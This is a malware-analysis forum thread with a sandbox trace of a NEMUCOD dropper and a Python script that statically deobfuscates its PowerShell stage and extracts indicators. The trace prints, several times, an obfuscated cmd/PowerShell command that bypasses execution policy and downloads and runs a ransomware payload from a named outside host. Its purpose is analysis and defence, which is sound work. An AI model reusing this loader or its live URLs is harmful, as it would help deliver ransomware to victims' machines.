A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #29955  by Tester0116
 Mon Feb 13, 2017 12:16 am
Hi all. I am a beginner in RE. I would like to know the approach to analyzing malware. I dumped the malware sample into PE Studio and I can see IsDebuggerPresent, GetTickCount, etc. Is this malware packed? If so, what strategy can I use to unpack it?
 #30055  by maddog4012
 Wed Mar 01, 2017 6:20 pm
factura9.js is a variant of NEMUCOD; it connects to
Code:
uzyzyxu.poreved.net
hzibi.poreved.net
axeqekynefi.poreved.net
ycypaqesoh.poreved.net
saunabau.sk/index.pjk
index.pjk is a variant of CRYPTLOCK (attached).
Code:
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptbase.dll, 75560000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0		2340
Call Window API	API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 101e2		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, sxs.dll, 70eb0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, dwmapi.dll, 75410000 ) Return: 0		2340
Call Window API	API Name: CreateWindowExA Args: ( 0, cd2e6c, , 0, 0, 0, 1, 1, 0, 0, cd0000, 82f860 ) Return: 101e4		2340
Call COM API	API Name: CLSIDFromString Args: ( JScript ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, clbcatq.dll, 75e90000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\jscript.dll, 70df0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\system32\advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, wintrust.dll, 75a60000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptsp.dll, 75330000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\system32\rsaenh.dll, 752f0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptbase.dll, 75560000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, msisip.dll, 70de0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0		2340
Call Filesystem API	API Name: NtReadFile Args: ( 1f8, , , , , , 200, , ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 1002, %windir%\syswow64\crypt32.dll, 774a0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, imm32.dll, 75670000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\wshext.dll, 70dc0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\scrobj.dll, 70d90000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptsp.dll, 75330000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, rpcrtremote.dll, 73390000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\wshom.ocx, 70d60000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, shell32.dll, 76400000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, shell32.dll, 76400000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, propsys.dll, 72cc0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, comctl32.dll, 72de0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, comctl32.dll, 72de0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, oleaut32.dll, 77050000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, apphelp.dll, 72c70000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, comctl32.dll, 72de0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\ieframe.dll, 71740000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, urlmon.dll, 758c0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, setupapi.dll, 76150000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 3099b6c, 0, %windir%\system32\propsys.dll, 72cc0000 ) Return: 0		2340
Call Filesystem API	API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Caches, 0 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, ntmarta.dll, 74810000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, profapi.dll, 72dd0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\urlmon.dll, 758c0000 ) Return: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, sspicli.dll, 75570000 ) Return: 0		2340
Call Systeminfo API	API Name: GetUserNameExW Args: ( 10002, Administrator, 3d2f460 ) Return: 1		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1		2340
Write Registry Key	Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, shell32.dll, 76400000 ) Return: 0		2340
Call Thread API	API Name: NtGetContextThread Args: ( 756, 3d2e758 ) Return: 0		2340
Call Process API	API Name: CreateProcessW Args: ( %windir%\System32\cmd.exe, "%windir%\System32\cmd.exe" /c "powershell $ultute='^Process';$yrmynw='^olicy B';$setuk='^$path);';$ulyc='^k/index';$ajuk='^ $path';$funci='^xe'');(N';$gyffywf='^ew-Obje';$ovut='^nloadFi';$zijuk='^emp+''\i';$vowpu='^Set-Exe';$pluziqm='^cutionP';$opsubi='^nabau.s';$gyba='^.pjk '',';$uxed='^Webclie';$qhuzuww='^ Start-';$gydip='^em.Net.';$ezgylxy='^le(''htt';$gowu='^($env:t';$urqucla='^ $path=';$edeqo='^ct Syst';$ewcit='^qpaby.e';$jyvy='^rocess;';$abmofo='^p://sau';$rqazse='^Scope P';$kvexmy='^nt).Dow';$yxluge='^ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\", , , , , , %WorkingDir%, SW_HIDE, Process:2520:%windir%\SysWOW64\cmd.exe ) Return: 1		2340
Call System API	API Name: LdrLoadDll Args: ( 5e0f3c, 0, oleaut32.dll, 77050000 ) Return: 0		2340
Call Window API	API Name: DestroyWindow Args: ( 101e2 ) Return: 1		2340
Detection	
Threat characteristic: Creates command line process
Process ID: 2520
Image Path: %windir%\SysWOW64\cmd.exe "%windir%\System32\cmd.exe" /c "powershell $ultute='^Process';$yrmynw='^olicy B';$setuk='^$path);';$ulyc='^k/index';$ajuk='^ $path';$funci='^xe'');(N';$gyffywf='^ew-Obje';$ovut='^nloadFi';$zijuk='^emp+''\i';$vowpu='^Set-Exe';$pluziqm='^cutionP';$opsubi='^nabau.s';$gyba='^.pjk '',';$uxed='^Webclie';$qhuzuww='^ Start-';$gydip='^em.Net.';$ezgylxy='^le(''htt';$gowu='^($env:t';$urqucla='^ $path=';$edeqo='^ct Syst';$ewcit='^qpaby.e';$jyvy='^rocess;';$abmofo='^p://sau';$rqazse='^Scope P';$kvexmy='^nt).Dow';$yxluge='^ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\"
Call Filesystem API	API Name: FindFirstFileExW Args: ( %windir%\System32\WindowsPowerShell\v1.0\powershell.*, 1, 16ef90, 0, 0, 2 ) Return: 35b980	2340	2520
Call Thread API	API Name: NtGetContextThread Args: ( 360, 16e2ac ) Return: 0	2340	2520
Call Process API	API Name: CreateProcessW Args: ( %windir%\System32\WindowsPowerShell\v1.0\powershell.exe, powershell $ultute='Process';$yrmynw='olicy B';$setuk='$path);';$ulyc='k/index';$ajuk=' $path';$funci='xe'');(N';$gyffywf='ew-Obje';$ovut='nloadFi';$zijuk='emp+''\i';$vowpu='Set-Exe';$pluziqm='cutionP';$opsubi='nabau.s';$gyba='.pjk '',';$uxed='Webclie';$qhuzuww=' Start-';$gydip='em.Net.';$ezgylxy='le(''htt';$gowu='($env:t';$urqucla=' $path=';$edeqo='ct Syst';$ewcit='qpaby.e';$jyvy='rocess;';$abmofo='p://sau';$rqazse='Scope P';$kvexmy='nt).Dow';$yxluge='ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\, , , , , , %WorkingDir%, , Process:2552:%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) Return: 1	2340	2520
Detection	
Threat characteristic: Creates process in system directory
Process ID: 2552
Image Path: %windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $ultute='Process';$yrmynw='olicy B';$setuk='$path);';$ulyc='k/index';$ajuk=' $path';$funci='xe'');(N';$gyffywf='ew-Obje';$ovut='nloadFi';$zijuk='emp+''\i';$vowpu='Set-Exe';$pluziqm='cutionP';$opsubi='nabau.s';$gyba='.pjk '',';$uxed='Webclie';$qhuzuww=' Start-';$gydip='em.Net.';$ezgylxy='le(''htt';$gowu='($env:t';$urqucla=' $path=';$edeqo='ct Syst';$ewcit='qpaby.e';$jyvy='rocess;';$abmofo='p://sau';$rqazse='Scope P';$kvexmy='nt).Dow';$yxluge='ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\		
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, cryptbase.dll, 75560000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0	2520	2552
Call Window API	API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 201e6	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, clbcatq.dll, 75e90000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 385a5c, 0, %windir%\system32\shell32.dll, 76400000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, ole32.dll, 77130000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, userenv.dll, 728e0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, comctl32.dll, 72de0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, comctl32.dll, 72de0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, shell32.dll, 76400000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, oleaut32.dll, 77050000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, ole32.dll, 77130000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 39724c, 0, %windir%\system32\propsys.dll, 72cc0000 ) Return: 0	2520	2552
Call Filesystem API	API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Caches, 0 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2b3ca4, 0, ntmarta.dll, 74810000 ) Return: 0	2520	2552
Write Registry Key	Key: HKEY_CURRENT_USER\SOFTWARE\Classes\Local Settings\MuiCache\9B\52C64B7E\LanguageList Value: en-US\0en\0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, apphelp.dll, 72c70000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e02a6c, 0, %windir%\system32\shdocvw.dll, 728b0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, propsys.dll, 72cc0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, oleaut32.dll, 77050000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, %windir%\system32\shell32.dll, 76400000 ) Return: 0	2520	2552
Call Filesystem API	API Name: CreateDirectoryW Args: ( %APPDATA%\Microsoft\Windows\Recent\CustomDestinations, 0 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 383a6c, 0, %windir%\syswow64\shell32.dll, 76400000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, linkinfo.dll, 728a0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, propsys.dll, 72cc0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, oleaut32.dll, 77050000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, profapi.dll, 72dd0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, user32.dll, 75b90000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, ntshrui.dll, 72830000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, srvcli.dll, 729c0000 ) Return: 0	2520	2552
Call Systeminfo API	API Name: GetComputerNameExW Args: ( 0, NeilOffice, 10 ) Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, setupapi.dll, 76150000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, cscapi.dll, 72820000 ) Return: 0	2520	2552
Call Internet Helper API	API Name: NetShareEnum Args: ( , 503, 72860250, -1, 19e9c0, 19e9bc, 0 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, slc.dll, 73030000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, shlwapi.dll, 75a00000 ) Return: 0	2520	2552
Call Systeminfo API	API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1	2520	2552
Call Systeminfo API	API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1	2520	2552
Call Filesystem API	API Name: CreateDirectoryW Args: ( %APPDATA%\Microsoft\Windows\Recent\CustomDestinations, 0 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, cryptsp.dll, 75330000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, %windir%\system32\rsaenh.dll, 752f0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, cryptbase.dll, 75560000 ) Return: 0	2520	2552
Add File	Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\92N1BEHO885SX4SPL6K0.temp Type: VSDT_COM_DOS	2520	2552
Write File	Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\92N1BEHO885SX4SPL6K0.temp Type: VSDT_COM_DOS	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Add File	Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP Type: VSDT_EMPTY	2520	2552
Add File	Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP Type: VSDT_COM_DOS	2520	2552
Add File	Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms Type: VSDT_COM_DOS	2520	2552
Call Filesystem API	API Name: DeleteFileW Args: ( %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP ) Return: 1	2520	2552
Call Window API	API Name: DestroyWindow Args: ( 201e6 ) Return: 1	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, shlwapi.dll, 75a00000 ) Return: 0	2520	2552
Attachments
pw virus
(351.85 KiB) Downloaded 62 times
Last edited by maddog4012 on Wed Mar 01, 2017 6:22 pm, edited 2 times in total.
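The interesting part of the trace above is the cmd.exe -> powershell.exe hop: the script splits the real PowerShell one-liner into 26 short fragments assigned to random variable names, then glues them back together inside Invoke-Expression, and the cmd.exe stage additionally prefixes every fragment with a `^` (the cmd escape character, which cmd strips before powershell.exe ever sees the line, as the two CreateProcessW entries show). Below is an added example, not code from the post or from the sample, that reconstructs the command statically, i.e. without ever running it: the sample input is the CreateProcessW command line copied from the trace (minus the surrounding `cmd.exe /c "..."` wrapper), the caret handling and the `''` quote-doubling rule are standard cmd.exe and PowerShell behaviour, and the IOC regexes are my own assumptions about what is worth pulling out of a loader like this.

```python
"""Static deobfuscation of a cmd.exe -> powershell.exe string-concatenation loader.

Added example for this thread. Nothing is executed: the fragments are re-assembled
in the order the Invoke-Expression operand would have joined them, then IOCs are
pulled out of the plaintext result.
"""
import re

# Sample input: the CreateProcessW command line from the sandbox trace posted above
# (caret-escaped form as cmd.exe received it), without the cmd.exe /c "..." wrapper.
CMD_LINE = r"""powershell $ultute='^Process';$yrmynw='^olicy B';$setuk='^$path);';$ulyc='^k/index';$ajuk='^ $path';$funci='^xe'');(N';$gyffywf='^ew-Obje';$ovut='^nloadFi';$zijuk='^emp+''\i';$vowpu='^Set-Exe';$pluziqm='^cutionP';$opsubi='^nabau.s';$gyba='^.pjk '',';$uxed='^Webclie';$qhuzuww='^ Start-';$gydip='^em.Net.';$ezgylxy='^le(''htt';$gowu='^($env:t';$urqucla='^ $path=';$edeqo='^ct Syst';$ewcit='^qpaby.e';$jyvy='^rocess;';$abmofo='^p://sau';$rqazse='^Scope P';$kvexmy='^nt).Dow';$yxluge='^ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);"""

# $name='value'  -- inside a PowerShell single-quoted string, '' is an escaped quote
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
# the operand handed to Invoke-Expression: ($a+$b+...)
_IEX = re.compile(r"Invoke-Expression\s*\(([^)]*)\)", re.I)


def strip_cmd_carets(line: str) -> str:
    """cmd.exe treats '^' as an escape: drop the caret, keep the following character.
    This reproduces the difference between the cmd.exe and powershell.exe command
    lines recorded in the trace."""
    return re.sub(r"\^(.)", r"\1", line, flags=re.S)


def parse_assignments(ps_line: str) -> dict:
    """Map each $name to its literal value, undoing PowerShell's '' quote doubling."""
    return {name: raw.replace("''", "'") for name, raw in _ASSIGN.findall(ps_line)}


def concat_order(ps_line: str) -> list:
    """Variable names in the order the Invoke-Expression operand concatenates them."""
    m = _IEX.search(ps_line)
    if not m:
        raise ValueError("no Invoke-Expression (...) operand found")
    return re.findall(r"\$(\w+)", m.group(1))


def deobfuscate(cmd_line: str) -> str:
    """Rebuild the plaintext PowerShell that Invoke-Expression would have run."""
    ps_line = strip_cmd_carets(cmd_line)
    values = parse_assignments(ps_line)
    order = concat_order(ps_line)
    missing = [n for n in order if n not in values]
    if missing:  # a fragment referenced but never assigned means our parse is incomplete
        raise KeyError(f"fragments referenced but never assigned: {missing}")
    return "".join(values[n] for n in order)


def extract_iocs(plain: str) -> dict:
    """Pull the payload URL, dropped file name and behavioural markers from the
    deobfuscated script. The patterns are assumptions tailored to this loader style."""
    return {
        "urls": re.findall(r"https?://[^\s'\"]+", plain),
        "dropped_files": re.findall(r"\$env:temp\+'([^']+)'", plain, re.I),
        "execution_policy_bypass": bool(re.search(r"Set-ExecutionPolicy\s+Bypass", plain, re.I)),
        "download_and_run": bool(re.search(r"DownloadFile", plain, re.I)
                                 and re.search(r"Start-Process", plain, re.I)),
    }


if __name__ == "__main__":
    plain = deobfuscate(CMD_LINE)
    print(plain)
    for key, value in extract_iocs(plain).items():
        print(f"{key}: {value}")
```

Running it prints the reassembled one-liner (Set-ExecutionPolicy Bypass in process scope, DownloadFile of index.pjk into %TEMP%\iqpaby.exe, Start-Process on it) and the IOCs, which is exactly what the sandbox observed at the next stage. Because the reconstruction is purely lexical it also works when the sandbox has no network and the download never happens; the trade-off is that it only understands the `$x='...'` plus `Invoke-Expression ($a+$b)` shape, so a variant that builds fragments with `[char]` arrays or `-join` needs another resolver step rather than this regex pair.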
 #30056  by maddog4012
 Wed Mar 01, 2017 6:20 pm
Here is the rest of the info:
Code:
Delete File	Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP Type: VSDT_COM_DOS	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2df339c, 0, %windir%\microsoft.net\framework\v2.0.50727\mscorwks.dll, 70490000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, ntdll, 77a10000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e01bdc, 0, shell32.dll, 76400000 ) Return: 0	2520	2552
Call Filesystem API	API Name: CreateDirectoryW Args: ( C:\Users\Administrator, 0 ) Return: 0	2520	2552
Call Filesystem API	API Name: CreateDirectoryW Args: ( %APPDATA%, 0 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 0, 0, %windir%\system32\mscoree.dll, 72900000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e15554, 0, %windir%\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, 6f990000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, %windir%\microsoft.net\framework\v2.0.50727\ole32.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, ole32.dll, 77130000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e1aa4c, 0, %windir%\microsoft.net\framework\v2.0.50727\oleaut32.dll, 0 ) Return: c0000135	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, oleaut32.dll, 77050000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e16d74, 0, ole32.dll, 77130000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e1ffbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll, 6f1f0000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e23cf4, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\b1c511d8fad78ad3c5213b2b4fb02b8b\microsoft.powershell.consolehost.ni.dll, 72790000 ) Return: 0	2520	2552
Call System API	API Name: LdrLoadDll Args: ( 2e2d0cc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.management.a#\4436815b432c313255af322f4ec3560d\system.management.automation.ni.dll, 6e680000 ) Return: 0	2520	2552
